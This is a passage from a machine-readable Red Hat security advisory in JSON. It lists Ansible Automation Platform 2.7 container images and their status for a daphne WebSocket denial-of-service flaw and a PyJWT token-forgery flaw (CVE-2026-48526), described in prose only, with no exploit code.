"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "daphne: daphne: Denial of Service via excessive WebSocket message size"
},
{
"cve": "CVE-2026-48526",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-05-28T16:01:22.805235+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482734"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer\u0027s public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in PyJWT allows for authentication bypass and unauthorized access. It occurs when a JWT verifier is misconfigured to accept both symmetric and asymmetric algorithms, and a public JSON Web Key is erroneously used as the HMAC secret. Red Hat products are only affected if they utilize this specific, non-standard verifier configuration.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
